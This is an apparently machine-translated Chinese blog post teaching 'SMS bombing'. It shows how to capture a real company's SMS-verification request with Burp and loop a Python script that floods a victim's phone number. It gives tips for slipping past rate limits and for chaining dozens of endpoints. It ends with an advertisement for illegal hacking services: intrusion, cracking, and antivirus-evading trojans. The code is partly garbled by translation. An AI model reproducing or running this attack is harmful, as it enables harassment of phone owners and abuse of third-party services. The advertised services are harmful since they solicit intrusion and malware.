小测试，不要模仿 作者：我是Spring作家—— Hacker1ee 大家好，我是1ee（因为在作家群中，我没有添加黑客的前缀，我恐怕会被打败。） 我刚加入了春秋作家小组，我希望每个人都能照顾好他们，欢迎大家与我交谈。 今天，让我谈谈我最近发现的一个小想法，使用python进行短信轰炸。 首先 这是一个他的公司发送短信的网站 这时，我们打开神器打嗝或其他捕获工具（最好使用Burp，因为转发器模块可以满足我们的需求） 这时，我挂了我的Firefox代理，然后Burp打开拦截。 抓到一个数据包并将其发送到转发器 输入转发器分析包
{'mobile':'13xxxxxx'，'type':'注册'} 这是发送的数据，走了 看看返回的包可以看到它是成功的 然后开始编写我们的python循环并轰炸目标 导入请求 导入json Headers={'User-Agent' 'Mozilla/5.0（Windows NT 6.1; Win64; x64; rv: 56.0）Gecko/20100101 Firefox/56.0'，'Cookie':'da_a=77206194'，'Referer':'http://www.demlution.com/'} #data= #print数据 r=requests.post（'/capi/v1/dmhome/send_token'，data=json.dumps（{'mobile':'电话号码'，'type':'注册'}），headers=headers）     打印（r.text） 首次测试，测试完成后，您可以增强循环脚本的功能。经过我的研究，我发现当一个号码被多次提交时，它将被禁止。如果我一次发送10个数据包（即发送10条短信后）这个号码将不会再次发送，即使返回的包状态成功，但是短信不可用，实际上我们可以暂停十秒然后发送一个，这样它就不会被禁止，这也是测试所知。 好的，今天我会说这个，也许每个人都会说我直接加入黑名单的号码确实没问题，但我们可以挖掘这种类型的网站，然后一次发送一个界面，60个接口，一秒钟时钟是60条短信，功率仍然可以，成功的图片 专栏：我春秋学院:我是春秋学院 黑客业务列表介绍和一般分类： 类别：攻击入侵破解开发 1：攻击业务订单：暂时取消所有此类业务订单[仅销售常规IDC流量] 2：入侵业务清单：包括网站源代码，办公系统，黑色系统，教育系统等。 3：破解业务类：软件，加密文件，二次打包，脱壳等。 4：二次开发业务清单：软件二次开发，源代码二次开发等 5：其他业务订单：特洛伊木马[通过所有防病毒]，远程控制，特殊软件等 备注：未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间，请在咨询前阅读：业务交易流程及相关说明 注意:仅接受正式业务，个人无权接受。收集此内容。